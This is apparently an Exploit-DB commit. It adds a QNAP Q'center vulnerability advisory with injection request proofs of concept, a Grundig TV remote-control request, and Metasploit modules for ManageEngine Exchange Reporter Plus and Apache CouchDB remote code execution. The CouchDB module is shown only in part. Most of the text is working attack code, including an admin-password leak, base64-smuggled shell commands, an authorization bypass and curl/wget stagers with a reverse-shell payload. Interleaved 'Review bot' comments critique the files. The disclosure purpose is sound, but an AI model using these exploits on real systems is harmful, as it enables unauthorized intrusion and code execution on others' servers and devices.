DB: 2018-07-14
10 changes to exploits/shellcodes

G DATA Total Security 25.4.0.3 - Activex Buffer Overflow
Microsoft Windows - POP/MOV SS Local Privilege Elevation (Metasploit)
HID discoveryd - 'command_blink_on' Unauthenticated Remote Code Execution (Metasploit)
HID discoveryd - 'command_blink_on' Remote Code Execution (Metasploit)
IBM QRadar SIEM - Unauthenticated Remote Code Execution (Metasploit)
IBM QRadar SIEM - Remote Code Execution (Metasploit)
Manage Engine Exchange Reporter Plus - Remote Code Execution (Metasploit)
Apache CouchDB - Arbitrary Command Execution (Metasploit)
phpMyAdmin - (Authenticated) Remote Code Execution (Metasploit)
Hadoop YARN ResourceManager - Unauthenticated Command Execution (Metasploit)
Dolibarr 3.2.0 < Alpha - File Inclusion
Dolibarr ERP/CRM 3.2.0 < Alpha - File Inclusion
Dolibarr ERP/CRM - OS Command Injection
Dolibarr ERP/CRM < 3.2.0 / < 3.1.1 - OS Command Injection
Dolibarr ERP/CMS 3.4.0 - 'exportcsv.php?sondage' SQL Injection
Dolibarr ERP/CRM 3.4.0 - 'exportcsv.php?sondage' SQL Injection
Dolibarr CMS 3.5.3 - Multiple Vulnerabilities
Dolibarr ERP/CRM 3.5.3 - Multiple Vulnerabilities
Dolibarr CMS 3.0 - Local File Inclusion / Cross-Site Scripting
Dolibarr ERP/CRM 3.0 - Local File Inclusion / Cross-Site Scripting
Dolibarr ERP/CRM - '/user/index.php' Multiple SQL Injections
Dolibarr ERP/CRM - '/user/info.php?id' SQL Injection
Dolibarr ERP/CRM - '/admin/boxes.php?rowid' SQL Injection
Dolibarr ERP/CRM 3.1.0 - '/user/index.php' Multiple SQL Injections
Dolibarr ERP/CRM 3.1.0 - '/user/info.php?id' SQL Injection
Dolibarr ERP/CRM 3.1.0 - '/admin/boxes.php?rowid' SQL Injection
Dolibarr CMS 3.x - '/adherents/fiche.php' SQL Injection
Dolibarr ERP/CRM 3.x - '/adherents/fiche.php' SQL Injection
Dolibarr CMS 3.2 Alpha - Multiple Directory Traversal Vulnerabilities
Dolibarr ERP/CRM 3.2 Alpha - Multiple Directory Traversal Vulnerabilities
Dolibarr 7.0.0 - SQL Injection
Dolibarr ERP/CRM 7.0.0 - (Authenticated) SQL Injection
Dolibarr ERP CRM < 7.0.3 - PHP Code Injection
Dolibarr ERP/CRM < 7.0.3 - PHP Code Injection
ManageEngine Exchange Reporter Plus < Build 5311 - Remote Code Execution
WAGO e!DISPLAY 7300T - Multiple Vulnerabilities
QNAP Qcenter Virtual Appliance - Multiple Vulnerabilities
Zeta Producer Desktop CMS 14.2.0 - Remote Code Execution / Local File Disclosure
Grundig Smart Inter@ctive 3.0 - Cross-Site Request Forgery
parent e76244b41a
commit b374aca9a3
11 changed files with 1915 additions and 15 deletions
exploits/hardware/webapps/45015.txt (Normal file, 398 lines)
@@ -0,0 +1,398 @@
Core Security - Corelabs Advisory
http://corelabs.coresecurity.com/

QNAP Qcenter Virtual Appliance Multiple Vulnerabilities

1. *Advisory Information*

Title: QNAP Qcenter Virtual Appliance Multiple Vulnerabilities
Advisory ID: CORE-2018-0006
Advisory URL:
http://www.coresecurity.com/advisories/qnap-qcenter-multiple-vulnerabilities
Date published: 2018-07-11
Date of last update: 2018-07-11
Vendors contacted: QNAP
Release mode: Coordinated release

2. *Vulnerability Information*

Class: Information Exposure [CWE-200], Command Injection [CWE-77],
Command Injection [CWE-77], Command Injection [CWE-77],
Command Injection [CWE-77]
Impact: Code execution
Remotely Exploitable: Yes
Locally Exploitable: Yes
CVE Name: CVE-2018-0706, CVE-2018-0707, CVE-2018-0708, CVE-2018-0709,
CVE-2018-0710

3. *Vulnerability Description*

QNAP's website states that:

[1] Q'center Virtual Appliance is a central management platform that
enables you to consolidate the management of multiple QNAP NAS. The
Q'center web interface gives you the ease-of-use, cost-efficiency,
convenience and flexibility to manage multiple NAS, across multiple
sites, from any internet browser.

The platform's provides centralized web-based administration to manage
the following features:

- Review HDD S.M.A.R.T. values
- Monitor system status
- Manage apps and shared folders
- Review infographice reports

Multiple vulnerabilities were found in the Q'center Virtual Appliance
web console that would allow an attacker to execute arbitrary commands
on the system.

4. *Vulnerable versions*

. Q'center Virtual Appliance Version 1.6.1056 (20170825)
. Q'center Virtual Appliance Version 1.6.1075 (20171123)
Other products and versions might be affected, but they were not tested.

5. *Vendor Information, Solutions and Workarounds*

QNAP published the following Security Note:

. https://www.qnap.com/en-us/security-advisory/nas-201807-10

6. *Credits*

These vulnerabilities were discovered and researched by Ivan Huertas
from Core Security Consulting Services. The publication of this advisory
was coordinated by Leandro Cuozzo from Core Advisories Team.

7. *Technical Description / Proof of Concept Code*

QNAP's Q'center Virtual Appliance web console includes a functionality
that would allow an authenticated attacker to elevate privileges on the
system. We describe this issue in section 7.1.

Sections 7.2, 7.3, 7.4 and 7.5 show different methods to gain command
execution.

7.1. *Privilege escalation*

[CVE-2018-0706]
The application contains an API endpoint that returns information about
the accounts defined in the database. The information returned is
informative for all the users except for the admin user, which cames
with every installation, where an extra field is presented. This extra
field (new_password) contains the password defined at installation time
for the admin user encoded in base64.

Any authenticated user could access this API endpoint and retrieve the
admin user's password, therefore being able to login as an administrator.

The following proof of concept shows a user with viewer access
retrieving the admin's password encoded in base64 in the new_password
field.

/-----
GET /qcenter/hawkeye/v1/account?_dc=1519932315271 HTTP/1.1
Host: 192.168.1.178
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101
Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Referer: https://192.168.1.178/qcenter/
Cookie: CMS_lang=ENG; AUTHENTICATION=0; TIMEZONE_CODE=17;
DST_ENABLE=False; user=viewer; CMS_SID=IV4P74Y16X; ROLE=1082130432;
_ID=5a9847223af7e2034924e7b6; LOGIN_TIME=1519932215818; remember=false
Connection: close

HTTP/1.1 200 OK
Date: Thu, 01 Mar 2018 19:23:43 GMT
Server: Apache
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
X-Content-Type-Options: nosniff
Content-Type: application/json
Content-Length: 878
Connection: close

{
"total_count": 2,
"account": [
{
"dst_enable": false,
"name": "admin",
"default": true,
"new_password": "YWRtaW5pc3RyYWRvcg==",
"authentication": 0,
"create_time": {
"$date": 1519917983616
},
"role": 4294967295,
"timezone_code": 17,
"last_login": {
"$date": 1519929869797
},
"_id": "5a981b9f3af7e2030c883592",
"email": "",
"description": "administrator"
},
{
"dst_enable": false,
"name": "viewer",
"register_code": "",
"authentication": 0,
"create_time": {
"$date": 1519929122332
},
"role": 1082130432,
"timezone_code": 17,
"last_login": {
"$date": 1519932215818
},
"_id": "5a9847223af7e2034924e7b6",
"email": "",
"description": ""
}
]
}
-----/

As can be seen in the following excerpt, the decoded base64 data
corresponds to the plaintext administrator password set at installation
time.

/-----
$ echo YWRtaW5pc3RyYWRvcg== | base64 -d
administrador
-----/

7.2. *Command Execution in change password for the admin user*

[CVE-2018-0707]
When the admin user performs a password change, the application executes
an OS command to impact the changes. The input is not properly sanitized
when passed down to the OS, allowing an attacker to run arbitrary
commands.

/-----
POST /qcenter/hawkeye/v1/account?change_passwd HTTP/1.1
Host: 192.168.1.209
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101
Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json
X-Requested-With: XMLHttpRequest
Referer: https://192.168.1.209/qcenter/
Content-Length: 118
Cookie: CMS_lang=ENG; user=admin; CMS_SID=TWYH7A55X5; ROLE=4294967295;
_ID=5a8465ba3af7e2030984c84e; LOGIN_TIME=1518714672547;
AUTHENTICATION=0; TIMEZONE_CODE=17; DST_ENABLE=False; remember=false
Connection: close

{"_id":"5a8465ba3af7e2030984c84e","old_password":"dGlzMzhhZWw=","new_password":"Ijt0b3VjaCAvdG1wL2NoYW5nZXBhc3M7Ig=="}
-----/

The API requires to send the password encoded in base64. This makes a
lot easier to inject command as we do not need to bypass any filters.
For the admin user in the web application, there is also a backing user
present on the OS. When a password change is requested for this user,
the values submitted to the API are included in a "sudo passwd" command,
where the injection occurs.

In this particular case, the old_password must match the current
password, which can be obtained by exploiting [CVE-2018-0706].

7.3. *Command Execution in network config update*

[CVE-2018-0708]
The admin user created at installation time can modify the network
configuration. In order to do this, the admin has to access the settings
section which is protected by the OS password (which could be obtained
using the Privilege Escalation vulnerability described above). However,
we identified that a user with the Power User profile could also execute
this function, despite access not being provided through the web
application interface. This function requires to send the admin user
password encoded in base64 in the passwd field. This value is then used
to perform a sudo operation in the OS to change the network settings. We
used the passwd field to inject command
(";touch /tmp/netconfigpower; echo "a) and create a file in /tmp/.

/-----
POST /qcenter/hawkeye/v1/network_config HTTP/1.1
Host: 192.168.1.178
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101
Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json
X-Requested-With: XMLHttpRequest
Referer: https://192.168.1.178/qcenter/
Content-Length: 87
Cookie: CMS_lang=ENG; AUTHENTICATION=0; TIMEZONE_CODE=17;
DST_ENABLE=False; user=power; CMS_SID=MFVG0R9SMK; ROLE=1610612735;
_ID=5a9858ad3af7e2034924e7cc; LOGIN_TIME=1519934345000; remember=false
Connection: close

{"type":"0","dns_type":"0","passwd":"Ijt0b3VjaCAvdG1wL25ldGNvbmZpZ3Bvd2VyOyBlY2hvICJh"}
-----/

The passwd parameter is used in bash echo command unsanitized.

7.4. *Command Execution in date config update*

[CVE-2018-0709]
The admin user created at installation time is capable of modifying the
date configuration. In order to do this, the admin has to access the
settings section which is protected by the OS password (which could be
obtained using the Privilege Escalation vulnerability described above).
However, we identified that a user with the Power User profile could
execute this function, despite the access is not provided through the
web application interface. This function requires to submit the admin
user password encoded in base64 in the passwd field. This value is then
used to perform a sudo operation in the OS to change the date
configuration settings. We used the passwd field to inject command
(";touch /tmp/date_config;echo"lalala) and create a file in /tmp/.

/-----
POST /qcenter/hawkeye/v1/date_config HTTP/1.1
Host: 192.168.1.178
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101
Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json
X-Requested-With: XMLHttpRequest
Referer: https://192.168.1.178/qcenter/
Content-Length: 153
Cookie: CMS_lang=ENG; AUTHENTICATION=0; TIMEZONE_CODE=17;
DST_ENABLE=False; user=power; CMS_SID=MFVG0R9SMK; ROLE=1610612735;
_ID=5a9858ad3af7e2034924e7cc; LOGIN_TIME=1519934345000; remember=false
Connection: close

{"listValue":18,"type":"1","datefield":1518663600000,"passwd":"Ijt0b3VjaCAvdG1wL2RhdGVfY29uZmlnO2VjaG8ibGFsYWxh","date":"20180215","time":"16:40:31"}
-----/

The passwd parameter is used in bash echo command unsanitized.

7.5. *Command Execution in SSH settings config update*
[CVE-2018-0710]
The admin user created at installation time is capable of modifying the
SSH configuration. In order to do this, the admin has to access the
settings section which is protected by the OS password (which could be
obtained using the Privilege Escalation vulnerability). However, we
identified that a user with the Power User profile could execute this
function, despite the access is not provided through the web application
interface. This function requires to submit the admin user password
encoded in base64 in the passwd field. This value is then used to
perform a sudo operation in the OS to change the date configuration
settings. We used the passwd field to inject command
("";touch /tmp/ssh; echo "lalalala) and create a file in /tmp/.

/-----
POST /qcenter/hawkeye/v1/ssh_setting_config HTTP/1.1
Host: 192.168.1.178
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101
Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json
X-Requested-With: XMLHttpRequest
Referer: https://192.168.1.178/qcenter/
Content-Length: 82
Cookie: CMS_lang=ENG; AUTHENTICATION=0; TIMEZONE_CODE=17;
DST_ENABLE=False; user=power; CMS_SID=MFVG0R9SMK; ROLE=1610612735;
_ID=5a9858ad3af7e2034924e7cc; LOGIN_TIME=1519934345000; remember=false
Connection: close

{"ssh_enable":1,"port":22,"passwd":"Ijt0b3VjaCAvdG1wL3NzaDsgZWNobyAibGFsYWxhbGE="}
-----/

The passwd parameter is used in bash echo command unsanitized.

8. *Report Timeline*
2018-03-13: Core Security sent an initial notification to QNAP,
including a draft advisory.
2018-03-14: QNAP replied that they received the draft version of the
advisory and that they would review it.
2018-03-23: Core Security requested a status update.
2018-04-10: Core Security requested a confirmation about the reported
vulnerabilities and a tentative timescale to fix them.
2018-04-12: QNAP answered saying that they were unable to reproduce the
reported vulnerabilities and asked for more detailed information to
reproduce them.
2018-04-13: Core Security sent a more detailed guide to test.
2018-04-16: QNAP confirmed reception.
2018-04-26: Core Security requested a status update.
2018-04-29: QNAP confirmed the reported vulnerabilities and informed
that their software team were working in a fixed version.
2018-05-21: Core Security requested a status update.
2018-05-28: QNAP informed that a new version of Q'center would be
release by the week of June 4.
2018-05-28: Core Security thanked for the update and proposed June 13th
as publication date.
2018-05-29: QNAP answered saying that the new Q'center release was
delayed and asked to postpone the publication a week later.
2018-05-29: Core Security asked for a solidified release date in order
to go public at the same time.
2018-06-04: QNAP informed that they didn't have a confirmed date yet.
2018-06-08: Core Security asked QNAP for a status update.
2018-06-12: QNAP notified that Q'center was under testing, for that
reason they didn't have a confirmed release date.
2018-06-25: Core Security asked again for a status update.
2018-06-27: QNAP replied that they were expecting to release their
security advisory next week Thursday or Friday.
2018-06-28: Core Security informed QNAP that recommend vendors not to
publish near the weekend and proposed Wednesday July 11th as the
publication date.
2018-07-02: Core Security asked for a confirmation about the proposed
date.
2018-06-27: QNAP confirmed July 11th as the publication date.
2018-07-11: Advisory CORE-2018-0006 published.

9. *References*

[1] https://www.qnap.com/solution/qcenter/index.php

10. *About CoreLabs*

CoreLabs, the research center of Core Security, is charged with
anticipating the future needs and requirements for information security
technologies.
We conduct our research in several important areas of computer security
including system vulnerabilities, cyber attack planning and simulation,
source code auditing, and cryptography. Our results include problem
formalization, identification of vulnerabilities, novel solutions and
prototypes for new technologies. CoreLabs regularly publishes security
advisories, technical papers, project information and shared software
tools for public use at:
http://corelabs.coresecurity.com.

11. *About Core Security*

Core Security provides companies with the security insight they need to
know who, how, and what is vulnerable in their organization. The
company's threat-aware, identity & access, network security, and
vulnerability management solutions provide actionable insight and
context needed to manage security risks across the enterprise. This
shared insight gives customers a comprehensive view of their security
posture to make better security remediation decisions. Better insight
allows organizations to prioritize their efforts to protect critical
assets, take action sooner to mitigate access risk, and react faster if
a breach does occur.

Core Security is headquartered in the USA with offices and operations in
South America, Europe, Middle East and Asia. To learn more, contact Core
Security at (678) 304-4500 or info@coresecurity.com

12. *Disclaimer*

The contents of this advisory are copyright (c) 2018 Core Security and
(c) 2018 CoreLabs, and are licensed under a Creative Commons Attribution
Non-Commercial Share-Alike 3.0 (United States) License:
http://creativecommons.org/licenses/by-nc-sa/3.0/us/
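Review bot: the Report Timeline in section 8 lists "2018-06-27: QNAP confirmed July 11th as the publication date." after the 2018-07-02 entry, so that date is out of order and is most likely a typo for a date between 2018-07-02 and 2018-07-11; it should be corrected so the timeline reads chronologically. Section 7.5 also carries a copy-and-paste slip from 7.4: "perform a sudo operation in the OS to change the date configuration settings" should say SSH configuration settings, which is what the ssh_setting_config endpoint shown in that section updates. Finally, the Class line in section 2 repeats "Command Injection [CWE-77]" four times; stating it once with the four CVEs it applies to (CVE-2018-0707 through CVE-2018-0710) would make the mapping of classes to the five CVE names clearer.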
exploits/hardware/webapps/45022.txt (Normal file, 34 lines)
@@ -0,0 +1,34 @@
# Exploit Title: Grundig Smart Inter@ctive 3.0 - Cross-Site Request Forgery
# Date: 2018-07-§3
# Exploit Author: Ahmethan-Gultekin - t4rkd3vilz
# Vendor Homepage: https://www.grundig.com/
# Software Link: https://play.google.com/store/apps/details?id=arcelik
# Version: Before > Smart Inter@ctive 3.0
# Tested on: Kali Linux
# CVE : CVE-2018-13989

# I'm trying my TV.I saw a Grundig remote control application on
# Google Play. Computer I downloaded and decompiled APK.
# And I began to examine individual classes. I noticed in a class
# that a request was sent during operations on the command line.
# I downloaded the phone packet viewer and opened the control application and
# made some operations. And I saw that there was such a request;

# PoC

request ->
GET /sendrcpackage?keyid=-2544&keysymbol=-4081 HTTP/1.1
Host: 192.168.1.106:8085
Connection : Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)


response ->
HTTP/1.1 200 OK
Content-Type : text/plain

# Set rc key is handled for key id : -2544 key symbol : -4081
# The only requirement for the connection between the TV and the application
# was to have the same IP address. After I made the IP address on the TV
# and the phone and the IP address on the computer the same:
# I accessed the interface from the 8085 port. Now I could do anything from the computer :)
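Review bot: the PoC as written shows a remote-control endpoint that accepts a key press with no authentication at all (the GET to /sendrcpackage on port 8085 carries no cookie, token or session and the TV answers 200 to a plain HTTP client), so the root cause is missing authentication on that interface rather than the cross-site request forgery the title names; the write-up and the CVE text should say so, because the mitigation differs: the TV needs to pair with or authenticate the controlling client, not only check the origin of a browser request. The sentence "The only requirement ... was to have the same IP address" is unclear and presumably means the same network or subnet; it should be reworded. The Date line reads "2018-07-§3", a garbled digit that needs fixing, and "Version: Before > Smart Inter@ctive 3.0" should state the affected firmware versions unambiguously so operators can tell whether they are exposed.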
exploits/java/remote/45018.rb (Executable file, 91 lines)
@@ -0,0 +1,91 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking

include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::EXE

def initialize(info = {})
super(update_info(info,
'Name' => 'Manage Engine Exchange Reporter Plus Unauthenticated RCE',
'Description' => %q{
This module exploits a remote code execution vulnerability that
exists in Exchange Reporter Plus <= 5310, caused by execution of
bcp.exe file inside ADSHACluster servlet
},
'License' => MSF_LICENSE,
'Author' =>
[
'Kacper Szurek <kacperszurek@gmail.com>'
],
'References' =>
[
['URL', 'https://security.szurek.pl/manage-engine-exchange-reporter-plus-unauthenticated-rce.html']
],
'Platform' => ['win'],
'Arch' => [ARCH_X86, ARCH_X64],
'Targets' => [['Automatic', {}]],
'DisclosureDate' => 'Jun 28 2018',
'DefaultTarget' => 0))

register_options(
[
OptString.new('TARGETURI', [ true, 'The URI of the application', '/']),
Opt::RPORT(8181),
])

end

def bin_to_hex(s)
s.each_byte.map { |b| b.to_s(16).rjust(2,'0') }.join
end

def check
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'exchange', 'servlet', 'GetProductVersion')
})

unless res
vprint_error 'Connection failed'
return CheckCode::Safe
end

unless res.code == 200
vprint_status 'Target is not Manage Engine Exchange Reporter Plus'
return CheckCode::Safe
end

begin
json = res.get_json_document
raise if json.empty? || !json['BUILD_NUMBER']
rescue
vprint_status 'Target is not Manage Engine Exchange Reporter Plus'
return CheckCode::Safe
end

vprint_status "Version: #{json['BUILD_NUMBER']}"

if json['BUILD_NUMBER'].to_i <= 5310
return CheckCode::Appears
end

CheckCode::Safe
end

def exploit
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'exchange', 'servlet', 'ADSHACluster'),
'vars_post' => {
'MTCALL' => "nativeClient",
'BCP_RLL' => "0102",
'BCP_EXE' => bin_to_hex(generate_payload_exe)
}
})
end
end
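Review bot: in check, a nil response ("Connection failed") returns CheckCode::Safe, which reports an unreachable host as not vulnerable; CheckCode::Unknown is the right code there, and the same applies to the non-200 GetProductVersion branch unless the servlet is known to answer 200 on every real install, since an error page proves nothing about the build. Minor points: bin_to_hex can be written as s.unpack('H*').first, and the References list carries only the author's blog post; adding the vendor fix reference (the EDB title in this commit names Build 5311 as the fixed build) would let operators confirm they are on a patched build after a positive check.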
exploits/linux/remote/45019.rb (Executable file, 317 lines)
@@ -0,0 +1,317 @@
##
|
||||
# This module requires Metasploit: https://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
class MetasploitModule < Msf::Exploit::Remote
|
||||
|
||||
Rank = ExcellentRanking
|
||||
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
include Msf::Exploit::CmdStager
|
||||
include Msf::Exploit::FileDropper
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Apache CouchDB Arbitrary Command Execution',
|
||||
'Description' => %q{
|
||||
CouchDB administrative users can configure the database server via HTTP(S).
|
||||
Some of the configuration options include paths for operating system-level binaries that are subsequently launched by CouchDB.
|
||||
This allows an admin user in Apache CouchDB before 1.7.0 and 2.x before 2.1.1 to execute arbitrary shell commands as the CouchDB user,
|
||||
including downloading and executing scripts from the public internet.
|
||||
},
|
||||
'Author' => [
|
||||
'Max Justicz', # CVE-2017-12635 Vulnerability discovery
|
||||
'Joan Touzet', # CVE-2017-12636 Vulnerability discovery
|
||||
'Green-m <greenm.xxoo[at]gmail.com>' # Metasploit module
|
||||
],
|
||||
'References' => [
|
||||
['CVE', '2017-12636'],
|
||||
['CVE', '2017-12635'],
|
||||
['URL', 'https://justi.cz/security/2017/11/14/couchdb-rce-npm.html'],
|
||||
['URL', 'http://docs.couchdb.org/en/latest/cve/2017-12636.html'],
|
||||
['URL', 'https://lists.apache.org/thread.html/6c405bf3f8358e6314076be9f48c89a2e0ddf00539906291ebdf0c67@%3Cdev.couchdb.apache.org%3E']
|
||||
],
|
||||
'DisclosureDate' => 'Apr 6 2016',
|
||||
'License' => MSF_LICENSE,
|
||||
'Platform' => 'linux',
|
||||
'Arch' => [ARCH_X86, ARCH_X64],
|
||||
'Privileged' => false,
|
||||
'DefaultOptions' => {
|
||||
'PAYLOAD' => 'linux/x64/shell_reverse_tcp',
|
||||
'CMDSTAGER::FLAVOR' => 'curl'
|
||||
},
|
||||
'CmdStagerFlavor' => ['curl', 'wget'],
|
||||
'Targets' => [
|
||||
['Automatic', {}],
|
||||
['Apache CouchDB version 1.x', {}],
|
||||
['Apache CouchDB version 2.x', {}]
|
||||
],
|
||||
'DefaultTarget' => 0
|
||||
))
|
||||
|
||||
register_options([
|
||||
Opt::RPORT(5984),
|
||||
OptString.new('URIPATH', [false, 'The URI to use for this exploit to download and execute. (default is random)']),
|
||||
OptString.new('HttpUsername', [false, 'The username to login as']),
|
||||
OptString.new('HttpPassword', [false, 'The password to login with'])
|
||||
])
|
||||
|
||||
register_advanced_options([
|
||||
OptInt.new('Attempts', [false, 'The number of attempts to execute the payload.']),
|
||||
OptString.new('WritableDir', [true, 'Writable directory to write temporary payload on disk.', '/tmp'])
|
||||
])
|
||||
end
|
||||
|
||||
def check
|
||||
get_version
|
||||
version = Gem::Version.new(@version)
|
||||
return CheckCode::Unknown if version.version.empty?
|
||||
vprint_status "Found CouchDB version #{version}"
|
||||
|
||||
return CheckCode::Appears if version < Gem::Version.new('1.7.0') || version.between?(Gem::Version.new('2.0.0'), Gem::Version.new('2.1.0'))
|
||||
|
||||
CheckCode::Safe
|
||||
end
|
||||
|
||||
def exploit
|
||||
fail_with(Failure::Unknown, "Something went horribly wrong and we couldn't continue to exploit.") unless get_version
|
||||
version = @version
|
||||
|
||||
vprint_good("#{peer} - Authorization bypass successful") if auth_bypass
|
||||
|
||||
print_status("Generating #{datastore['CMDSTAGER::FLAVOR']} command stager")
|
||||
@cmdstager = generate_cmdstager(
|
||||
temp: datastore['WritableDir'],
|
||||
file: File.basename(cmdstager_path)
|
||||
).join(';')
|
||||
|
||||
register_file_for_cleanup(cmdstager_path)
|
||||
|
||||
if !datastore['Attempts'] || datastore['Attempts'] <= 0
|
||||
attempts = 1
|
||||
else
|
||||
attempts = datastore['Attempts']
|
||||
end
|
||||
|
||||
attempts.times do |i|
|
||||
print_status("#{peer} - The #{i + 1} time to exploit")
|
||||
send_payload(version)
|
||||
Rex.sleep(5)
|
||||
# break if we get the shell
|
||||
break if session_created?
|
||||
end
|
||||
end
|
||||
|
||||
# CVE-2017-12635
|
||||
# The JSON parser differences result in behaviour that if two 'roles' keys are available in the JSON,
|
||||
# the second one will be used for authorising the document write, but the first 'roles' key is used for subsequent authorization
|
||||
# for the newly created user.
|
||||
def auth_bypass
|
||||
username = datastore['HttpUsername'] || Rex::Text.rand_text_alpha_lower(4..12)
|
||||
password = datastore['HttpPassword'] || Rex::Text.rand_text_alpha_lower(4..12)
|
||||
@auth = basic_auth(username, password)
|
||||
|
||||
res = send_request_cgi(
|
||||
'uri' => normalize_uri(target_uri.path, "/_users/org.couchdb.user:#{username}"),
|
||||
'method' => 'PUT',
|
||||
'ctype' => 'application/json',
|
||||
'data' => %({"type": "user","name": "#{username}","roles": ["_admin"],"roles": [],"password": "#{password}"})
)

if res && (res.code == 200 || res.code == 201) && res.get_json_document['ok']
return true
else
return false
end
end

def get_version
@version = nil

begin
res = send_request_cgi(
'uri' => normalize_uri(target_uri.path),
'method' => 'GET',
'authorization' => @auth
)
rescue Rex::ConnectionError
vprint_bad("#{peer} - Connection failed")
return false
end

unless res
vprint_bad("#{peer} - No response, check if it is CouchDB. ")
return false
end

if res && res.code == 401
print_bad("#{peer} - Authentication required.")
return false
end

if res && res.code == 200
res_json = res.get_json_document

if res_json.empty?
vprint_bad("#{peer} - Cannot parse the response, seems like it's not CouchDB.")
return false
end

@version = res_json['version'] if res_json['version']
return true
end

vprint_warning("#{peer} - Version not found")
return true
end

def send_payload(version)
vprint_status("#{peer} - CouchDB version is #{version}") if version

version = Gem::Version.new(@version)
if version.version.empty?
vprint_warning("#{peer} - Cannot retrieve the version of CouchDB.")
# if target set Automatic, exploit failed.
if target == targets[0]
fail_with(Failure::NoTarget, "#{peer} - Couldn't retrieve the version automaticly, set the target manually and try again.")
elsif target == targets[1]
payload1
elsif target == targets[2]
payload2
end
elsif version < Gem::Version.new('1.7.0')
payload1
elsif version.between?(Gem::Version.new('2.0.0'), Gem::Version.new('2.1.0'))
payload2
elsif version >= Gem::Version.new('1.7.0') || Gem::Version.new('2.1.0')
fail_with(Failure::NotVulnerable, "#{peer} - The target is not vulnerable.")
end
end

# Exploit with multi requests
# payload1 is for the version of couchdb below 1.7.0
def payload1
rand_cmd1 = Rex::Text.rand_text_alpha_lower(4..12)
rand_cmd2 = Rex::Text.rand_text_alpha_lower(4..12)
rand_db = Rex::Text.rand_text_alpha_lower(4..12)
rand_doc = Rex::Text.rand_text_alpha_lower(4..12)
rand_hex = Rex::Text.rand_text_hex(32)
rand_file = "#{datastore['WritableDir']}/#{Rex::Text.rand_text_alpha_lower(8..16)}"

register_file_for_cleanup(rand_file)

send_request_cgi(
'uri' => normalize_uri(target_uri.path, "/_config/query_servers/#{rand_cmd1}"),
'method' => 'PUT',
'authorization' => @auth,
'data' => %("echo '#{@cmdstager}' > #{rand_file}")
)

send_request_cgi(
'uri' => normalize_uri(target_uri.path, "/#{rand_db}"),
'method' => 'PUT',
'authorization' => @auth
)

send_request_cgi(
'uri' => normalize_uri(target_uri.path, "/#{rand_db}/#{rand_doc}"),
'method' => 'PUT',
'authorization' => @auth,
'data' => %({"_id": "#{rand_hex}"})
)

send_request_cgi(
'uri' => normalize_uri(target_uri.path, "/#{rand_db}/_temp_view?limit=20"),
'method' => 'POST',
'authorization' => @auth,
'ctype' => 'application/json',
'data' => %({"language":"#{rand_cmd1}","map":""})
)

send_request_cgi(
'uri' => normalize_uri(target_uri.path, "/_config/query_servers/#{rand_cmd2}"),
'method' => 'PUT',
'authorization' => @auth,
'data' => %("/bin/sh #{rand_file}")
)

send_request_cgi(
'uri' => normalize_uri(target_uri.path, "/#{rand_db}/_temp_view?limit=20"),
'method' => 'POST',
'authorization' => @auth,
'ctype' => 'application/json',
'data' => %({"language":"#{rand_cmd2}","map":""})
)
end

# payload2 is for the version of couchdb below 2.1.1
def payload2
rand_cmd1 = Rex::Text.rand_text_alpha_lower(4..12)
rand_cmd2 = Rex::Text.rand_text_alpha_lower(4..12)
rand_db = Rex::Text.rand_text_alpha_lower(4..12)
rand_doc = Rex::Text.rand_text_alpha_lower(4..12)
rand_tmp = Rex::Text.rand_text_alpha_lower(4..12)
rand_hex = Rex::Text.rand_text_hex(32)
rand_file = "#{datastore['WritableDir']}/#{Rex::Text.rand_text_alpha_lower(8..16)}"

register_file_for_cleanup(rand_file)

res = send_request_cgi(
'uri' => normalize_uri(target_uri.path, "/_membership"),
'method' => 'GET',
'authorization' => @auth
)

node = res.get_json_document['all_nodes'][0]

send_request_cgi(
'uri' => normalize_uri(target_uri.path, "/_node/#{node}/_config/query_servers/#{rand_cmd1}"),
'method' => 'PUT',
'authorization' => @auth,
'data' => %("echo '#{@cmdstager}' > #{rand_file}")
)

send_request_cgi(
'uri' => normalize_uri(target_uri.path, "/#{rand_db}"),
'method' => 'PUT',
'authorization' => @auth
)

send_request_cgi(
'uri' => normalize_uri(target_uri.path, "/#{rand_db}/#{rand_doc}"),
'method' => 'PUT',
'authorization' => @auth,
'data' => %({"_id": "#{rand_hex}"})
)

send_request_cgi(
'uri' => normalize_uri(target_uri.path, "/#{rand_db}/_design/#{rand_tmp}"),
'method' => 'PUT',
'authorization' => @auth,
'ctype' => 'application/json',
'data' => %({"_id":"_design/#{rand_tmp}","views":{"#{rand_db}":{"map":""} },"language":"#{rand_cmd1}"})
)

send_request_cgi(
